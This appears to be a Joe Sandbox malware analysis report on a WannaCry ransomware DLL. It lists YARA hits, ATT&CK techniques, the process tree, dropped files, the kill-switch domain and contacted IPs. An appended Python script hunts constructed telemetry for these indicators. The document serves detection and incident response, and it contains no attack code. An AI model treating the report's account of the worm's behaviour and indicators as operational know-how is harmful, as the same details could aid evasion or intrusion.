                Source: Yara matchFile source: 00000028.00000000.599806801.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.902600386.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000000.404780139.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.902187383.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000029.00000002.902364285.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000029.00000000.610017301.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.902363987.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000000.425355415.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000000.392885761.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000000.399314141.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000000.405750585.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.416257871.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.902195308.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.902167065.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000024.00000002.902362977.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000000.398121607.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.902489489.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000000.389559026.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000000.595649330.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.588589475.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.422807100.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.902194107.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000000.532376607.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000028.00000002.902434304.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.902569116.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.902196541.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000000.425337469.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000000.400454619.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.422852544.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000000.536806617.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000000.408708378.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000002.902362984.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000000.540275578.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.902194188.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.902542043.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000000.505888524.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.902453528.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000000.503757113.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.902195437.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.416244851.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.902186533.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000000.509831563.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000002.902365996.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000000.487438968.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000000.404750620.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.708228244.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000000.490758156.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000000.400467949.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.405270747.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.902605125.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.902526140.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.407730501.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000024.00000000.584556975.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000000.529226941.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000000.401684447.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 5092, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: winlogon.exe PID: 564, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 612, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 3296, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 692, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 700, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 716, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 796, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 840, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 888, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dwm.exe PID: 952, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 276, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 312, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 532, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1108, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1120, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1144, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1220, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1272, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1340, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1356, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1480, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1528, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1536, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1660, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1728, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1736, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1772, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1780, type: MEMORYSTR
MITRE ATT&CK matrix, listed per tactic (a leading number is the signature hit count the matrix shows for that technique):
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 2 Command and Scripting Interpreter; 2 Service Execution; 1 Native API; At (Windows); Cron; Launchd
Persistence: 4 Windows Service; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: 4 Windows Service; 312 Process Injection; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Defense Evasion: 12 Masquerading; 31 Virtualization/Sandbox Evasion; 312 Process Injection; 1 Obfuscated Files or Information; 1 Rundll32; 1 Software Packing
Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 System Time Discovery; 361 Security Software Discovery; 31 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Remote System Discovery; 123 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Input Capture; 1 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: 2 Encrypted Channel; 12 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 2 Application Layer Protocol; Fallback Channels; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Impact: 1 Data Encrypted for Impact; Device Lockout; Delete Device Data
Behavior graph (ID 670273, sample HFKDS6VcNO, start date 20/07/2022, architecture WINDOWS, score 100)
Top-level signatures: Tries to download HTTP data from a sinkholed server; Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; 9 other signatures
Process tree:
• loaddll32.exe (started)
  • cmd.exe (started)
    • rundll32.exe (started)
      • mssecsvc.exe (started): contacts www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com; Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 5 other signatures; injects into winlogon.exe, lsass.exe, fontdrvhost.exe and 24 other processes
  • rundll32.exe (started): Drops executables to the windows directory (C:\Windows) and starts them
    • mssecsvc.exe (started): resolves www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com to 104.16.173.80 (ports 49722, 49729, 80; CLOUDFLARENETUS, United States), which triggers "Tries to resolve many domain names, but no domain seems valid"; drops C:\Windows\tasksche.exe (PE32); Drops executables to the windows directory (C:\Windows) and starts them
      • tasksche.exe (started): Detected Wannacry Ransomware
  • rundll32.exe (started): drops C:\Windows\mssecsvc.exe (PE32)
• mssecsvc.exe (started): Maps a DLL or memory area into another process; injects into dwm.exe
• svchost.exe (started): connects to 127.0.0.1

Submitted file (Source | Detection | Scanner | Label):
HFKDS6VcNO.dll | 87% | Virustotal |
HFKDS6VcNO.dll | 90% | ReversingLabs | Win32.Ransomware.WannaCry
HFKDS6VcNO.dll | 100% | Avira | W32/Virut.Gen
HFKDS6VcNO.dll | 100% | Joe Sandbox ML |
Dropped files (Source | Detection | Scanner | Label):
C:\Windows\mssecsvc.exe | 100% | Avira | W32/Virut.Gen
C:\Windows\tasksche.exe | 100% | Avira | TR/FileCoder.AU
C:\Windows\mssecsvc.exe | 100% | Joe Sandbox ML |
C:\Windows\tasksche.exe | 100% | Joe Sandbox ML |
C:\Windows\mssecsvc.exe | 90% | Virustotal |
C:\Windows\mssecsvc.exe | 83% | Metadefender |
C:\Windows\mssecsvc.exe | 98% | ReversingLabs | Win32.Ransomware.WannaCry
C:\Windows\tasksche.exe | 90% | Virustotal |
C:\Windows\tasksche.exe | 85% | Metadefender |
C:\Windows\tasksche.exe | 95% | ReversingLabs | Win32.Ransomware.WannaCry
Unpacked PE files (Source | Detection | Scanner | Label):
4.0.mssecsvc.exe.400000.6.unpack | 100% | Avira | W32/Virut.Gen
4.2.mssecsvc.exe.7100a4.1.unpack | 100% | Avira | TR/FileCoder.AU
9.2.mssecsvc.exe.7100a4.1.unpack | 100% | Avira | TR/FileCoder.AU
6.0.mssecsvc.exe.7100a4.5.unpack | 100% | Avira | TR/FileCoder.AU
6.0.mssecsvc.exe.7100a4.1.unpack | 100% | Avira | TR/FileCoder.AU
9.0.mssecsvc.exe.7100a4.1.unpack | 100% | Avira | TR/FileCoder.AU
4.2.mssecsvc.exe.400000.0.unpack | 100% | Avira | W32/Virut.Gen
4.0.mssecsvc.exe.400000.0.unpack | 100% | Avira | W32/Virut.Gen
6.2.mssecsvc.exe.400000.0.unpack | 100% | Avira | TR/FileCoder.AU
4.0.mssecsvc.exe.400000.2.unpack | 100% | Avira | W32/Virut.Gen
19.0.tasksche.exe.400000.0.unpack | 100% | Avira | TR/FileCoder.AU
4.0.mssecsvc.exe.400000.4.unpack | 100% | Avira | W32/Virut.Gen
4.0.mssecsvc.exe.7100a4.5.unpack | 100% | Avira | TR/FileCoder.AU
6.0.mssecsvc.exe.7100a4.7.unpack | 100% | Avira | TR/FileCoder.AU
6.0.mssecsvc.exe.400000.2.unpack | 100% | Avira | W32/Virut.Gen
4.0.mssecsvc.exe.7100a4.7.unpack | 100% | Avira | TR/FileCoder.AU
4.0.mssecsvc.exe.7100a4.1.unpack | 100% | Avira | TR/FileCoder.AU
9.0.mssecsvc.exe.400000.0.unpack | 100% | Avira | W32/Virut.Gen
6.0.mssecsvc.exe.7100a4.3.unpack | 100% | Avira | TR/FileCoder.AU
19.2.tasksche.exe.400000.0.unpack | 100% | Avira | TR/FileCoder.AU
9.2.mssecsvc.exe.400000.0.unpack | 100% | Avira | W32/Virut.Gen
6.0.mssecsvc.exe.400000.0.unpack | 100% | Avira | W32/Virut.Gen
6.2.mssecsvc.exe.7100a4.1.unpack | 100% | Avira | TR/FileCoder.AU
4.0.mssecsvc.exe.7100a4.3.unpack | 100% | Avira | TR/FileCoder.AU
6.0.mssecsvc.exe.400000.4.unpack | 100% | Avira | W32/Virut.Gen
6.0.mssecsvc.exe.400000.6.unpack | 100% | Avira | W32/Virut.Gen
Domains (Source | Detection | Scanner):
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | 12% | Virustotal
URLs (Source | Detection | Scanner | Label):
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | 100% | URL Reputation | malware
https://www.kryptoslogic.com | 0% | URL Reputation | safe
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/ | 100% | URL Reputation | malware
http://Passport.NET/tb | 0% | Virustotal |
http://Passport.NET/tb | 0% | Avira URL Cloud | safe
http://schemas.msoft | 0% | Avira URL Cloud | safe
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ | 0% | URL Reputation | safe
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | 104.16.173.80 | true | true | | unknown
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/ | true | URL Reputation: malware | unknown
URLs found in memory or dropped files (Name | Source | Malicious | Antivirus Detection | Reputation):
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | mssecsvc.exe.2.dr | true | URL Reputation: malware | unknown
https://www.kryptoslogic.com | mssecsvc.exe, 00000006.00000002.474520495.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
http://www.google.com | svchost.exe, 00000015.00000002.919070637.00000259A18C6000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000015.00000000.493124863.00000259A18C6000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://Passport.NET/tb | svchost.exe, 0000001C.00000000.540958832.000002BE77DB0000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://schemas.msoft | svchost.exe, 00000018.00000000.520202728.000002670D023000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ | mssecsvc.exe, 00000004.00000002.706316354.000000000019C000.00000004.00000010.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
Contacted public IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
104.16.173.80 | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | United States | 13335 | CLOUDFLARENETUS | true
Contacted private / loopback IPs:
127.0.0.1
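Added example, not part of the Joe Sandbox report: a small hunt over constructed DNS, process-creation and image-load records for the indicators the tables above list. The sinkholed domain www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is the WannaCry kill switch (a successful HTTP fetch from it is what makes the worm routine exit, which is why the domain must never be blocked at the resolver); the dropped paths C:\Windows\mssecsvc.exe and C:\Windows\tasksche.exe, the rundll32.exe -> mssecsvc.exe -> tasksche.exe chain and the submitted file's SHA256 come from the behavior graph and the tables. Note that this report shows the sample both resolving the sinkhole and still dropping tasksche.exe, so a kill-switch query in your logs proves the dropper executed, not that it was contained. The record formats, hostnames, timestamps and the aaaa/bbbb/cccc hashes are assumptions constructed for the example, not any sensor's real output.

```python
"""Hunt constructed DNS / process / image-load records for the indicators in
this report. Added example; the record formats below are an assumption made
for illustration, not the output format of any particular sensor."""
import re
from dataclasses import dataclass

# Indicators taken from the report tables and behaviour graph.
SINKHOLE_DOMAIN = "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com"
DROPPED_PATHS = {r"c:\windows\mssecsvc.exe", r"c:\windows\tasksche.exe"}
KNOWN_SHA256 = {"757f15a84e4a94e139d44d03450241f161442785d216a6220c7332edcda79539"}
# Parent -> child pairs from the behaviour graph.
SUSPICIOUS_CHAINS = {("rundll32.exe", "mssecsvc.exe"), ("mssecsvc.exe", "tasksche.exe")}

# Constructed record formats (assumption):
#   <ts> <host> dns query=<name> answer=<ip>
#   <ts> <host> proc parent=<path> image=<path> sha256=<hex>
#   <ts> <host> load image=<path> sha256=<hex>
DNS_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) dns query=(?P<name>\S+) answer=(?P<ip>\S+)$")
PROC_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) proc parent=(?P<parent>\S+) image=(?P<image>\S+) sha256=(?P<sha>\S+)$")
LOAD_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) load image=(?P<image>\S+) sha256=(?P<sha>\S+)$")


@dataclass(frozen=True)
class Finding:
    host: str
    kind: str
    detail: str


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def hunt(lines):
    """Return one Finding per indicator hit, in input order."""
    findings = []
    for line in lines:
        if m := DNS_RE.match(line):
            if m["name"].lower().rstrip(".") == SINKHOLE_DOMAIN:
                findings.append(Finding(m["host"], "sinkhole-dns", f"{m['name']} -> {m['ip']}"))
        elif m := PROC_RE.match(line):
            image = m["image"].lower()
            if image in DROPPED_PATHS:
                findings.append(Finding(m["host"], "dropped-path", image))
            chain = (_basename(m["parent"]), _basename(image))
            if chain in SUSPICIOUS_CHAINS:
                findings.append(Finding(m["host"], "process-chain", " -> ".join(chain)))
            if m["sha"].lower() in KNOWN_SHA256:
                findings.append(Finding(m["host"], "known-hash", m["sha"].lower()))
        elif m := LOAD_RE.match(line):
            if m["sha"].lower() in KNOWN_SHA256:
                findings.append(Finding(m["host"], "known-hash", f"{m['image']} {m['sha'].lower()}"))
    return findings


def summarize(findings):
    """Map host -> sorted list of distinct finding kinds."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f.host, set()).add(f.kind)
    return {h: sorted(k) for h, k in by_host.items()}


def dropper_executed_on(findings):
    """Hosts that queried the kill-switch domain: the dropper ran there.
    Whether the following HTTP fetch succeeded (and so whether the worm
    routine exited) needs the proxy/HTTP log; a DNS answer alone proves
    execution, not containment."""
    return sorted({f.host for f in findings if f.kind == "sinkhole-dns"})


# Constructed sample telemetry: hostnames, timestamps and the aaaa/bbbb/cccc
# hashes are made up; the domain, paths and the sample SHA256 are from the report.
SAMPLE_LINES = [
    "2022-07-20T19:38:10Z ws01 load image=C:\\Users\\u\\HFKDS6VcNO.dll sha256=757f15a84e4a94e139d44d03450241f161442785d216a6220c7332edcda79539",
    "2022-07-20T19:38:11Z ws01 dns query=www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com answer=104.16.173.80",
    "2022-07-20T19:38:12Z ws01 proc parent=C:\\Windows\\System32\\rundll32.exe image=C:\\Windows\\mssecsvc.exe sha256=aaaa",
    "2022-07-20T19:38:13Z ws01 proc parent=C:\\Windows\\mssecsvc.exe image=C:\\Windows\\tasksche.exe sha256=bbbb",
    "2022-07-20T19:40:00Z ws02 dns query=www.google.com answer=203.0.113.5",
    "2022-07-20T19:40:01Z ws02 proc parent=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\notepad.exe sha256=cccc",
]

if __name__ == "__main__":
    found = hunt(SAMPLE_LINES)
    for f in found:
        print(f"{f.host}: {f.kind}: {f.detail}")
    print("hosts that executed the dropper:", dropper_executed_on(found))
```

The path indicators are matched case-insensitively on the full path, the chain check only on image basenames (an mssecsvc.exe dropped elsewhere would still hit the chain rule but not the path rule), and hashes are compared only against the submitted DLL because the report gives no hashes for the two dropped executables.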
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 670273
Start date and time: 2022-07-20 19:36:41 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 51s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: HFKDS6VcNO (renamed file extension from none to dll)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 28
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.rans.troj.evad.winDLL@18/4@2/2
EGA Information:
• Successful, ratio: 75%
HDC Information:
• Successful, ratio: 39.9% (good quality ratio 36.3%)
• Quality average: 76.9%
• Quality standard deviation: 32.2%
HCA Information:
• Successful, ratio: 78%
• Number of executed functions: 17
• Number of non-executed functions: 85
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Override analysis time to 240s for rundll32
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
                  • Excluded IPs from analysis (whitelisted): 23.35.236.56, 20.42.65.92
                  • Excluded domains from analysis (whitelisted): ldyouw.com, gefpqv.com, eaqmly.com, ypfefo.com, eekkiz.com, eaqtlo.com, lyeaew.com, fs-wildcard.microsoft.com.edgekey.net, ogggyz.com, cododi.com, loozpo.com, cxfuoy.com, ibmzei.com, yzeofb.com, mupjvv.com, atiajo.com, xaatge.com, lovzje.com, mipimr.com, vurdyj.com, ttviky.com, bnkmik.com, onedsblobprdeus17.eastus.cloudapp.azure.com, vuhaba.com, nbfpvs.com, ebalrg.com, iyvsrd.com, asesdh.com, ueercj.com, syeyep.com, uqghqa.com, yivanc.com, vpqnxj.com, emjlon.com, yurwei.com, kyivtg.com, peyuye.com, prod.fs.microsoft.com.akadns.net, zynrye.com, izuupl.com, ikgcbn.com, nuzyfp.com, ant.trenz.pl, hhvuzb.com, flcdqa.com, ybeujn.com, yuayzn.com, omxsxm.com, ayxohj.com, zaobbc.com, oktbec.com, mdrnku.com, iodilu.com, wabuqy.com, yraxyh.com, igeeyv.com, kqurib.com, faepoi.com, jrkbyt.com, watson.telemetry.microsoft.com, tdfkhn.com, ocxepi.com, fs.microsoft.com, iuwutz.com, pombmi.com, teasgj.com, logaer.com, viswai.com, yzwoea.com, cqofos.com, duomeu.com, rjajzc.com, blob
• Execution Graph export aborted for target tasksche.exe, PID 5936 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtWriteVirtualMemory calls found
Time | Type | Description
19:38:09 | API Interceptor | 1x Sleep call for process loaddll32.exe modified
19:39:36 | API Interceptor | 2x Sleep call for process svchost.exe modified
Context for IP 104.16.173.80, seen in earlier analyses (all classified malicious, all with context www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/): JnkyebSa2E.dll, WTU37w2UrJ.dll, FFrKRs5Q7y.dll, kFsMzLOFfN.dll, gaxuKGW0Q6.dll, 1lRKsdR45K.dll, tZLWyPj8zh.dll, ffv4z4GV2N.dll, u6J827hhVw.dll, HixFSv1wxE.dll, rQJydZ0McE.dll, O9KOr4E9LK.dll, FjYNZSPNkt.dll, zZMmONZWnO.dll, HR098Ebr1z.dll, q18L3fXHcX.dll, fPFPnWqeow.dll, 25HrP4nB7z.dll, qeoYR80875.dll, 0AoAuUD0hv.dll
Context for domain www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, seen in earlier analyses (all classified malicious; the IP the domain resolved to in each analysis in parentheses): JnkyebSa2E.dll (104.17.244.81), WV7Bz2jmCx.dll (104.17.244.81), WTU37w2UrJ.dll (104.16.173.80), FFrKRs5Q7y.dll (104.16.173.80), kFsMzLOFfN.dll (104.16.173.80), BpT3BAEHhP.dll (104.17.244.81), gaxuKGW0Q6.dll (104.17.244.81), 1lRKsdR45K.dll (104.16.173.80), tZLWyPj8zh.dll (104.16.173.80), ffv4z4GV2N.dll (104.16.173.80), cgNiSkfqqo.dll (104.17.244.81), u6J827hhVw.dll (104.16.173.80), HixFSv1wxE.dll (104.16.173.80), rQJydZ0McE.dll (104.16.173.80), L0nkxaIRJN.dll (104.17.244.81), c4hZhje8xX.dll (104.17.244.81), 3JaR0zYKpu.dll (104.17.244.81), svRn7r2Rty.dll (104.17.244.81), O9KOr4E9LK.dll (104.16.173.80), FjYNZSPNkt.dll (104.16.173.80)
Context for ASN CLOUDFLARENETUS, seen in earlier analyses (all classified malicious; the contacted IP in parentheses): JnkyebSa2E.dll (104.17.244.81), WV7Bz2jmCx.dll (104.17.244.81), kFsMzLOFfN.dll (104.17.244.81), BpT3BAEHhP.dll (104.17.244.81), gaxuKGW0Q6.dll (104.17.244.81), https://doggyorama.com (104.17.25.14), tZLWyPj8zh.dll (104.17.244.81), ffv4z4GV2N.dll (104.17.244.81), https://my.upflowy.com/qaq-conveyor-engineering-and-manufacturing (104.17.24.14), RingCentral__voice_message.htm (104.18.10.207), cgNiSkfqqo.dll (104.17.244.81), u6J827hhVw.dll (104.17.244.81), HixFSv1wxE.dll (104.17.244.81), L0nkxaIRJN.dll (104.17.244.81), NuLbW6Y31T.dll (162.158.54.184), c4hZhje8xX.dll (104.17.244.81), 3JaR0zYKpu.dll (104.17.244.81), svRn7r2Rty.dll (104.17.244.81), O9KOr4E9LK.dll (104.17.244.81), FjYNZSPNkt.dll (104.17.244.81)
                  Process:C:\Windows\System32\svchost.exe
                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xd1be2d20, page size 16384, DirtyShutdown, Windows version 10.0
                  Category:dropped
                  Size (bytes):786432
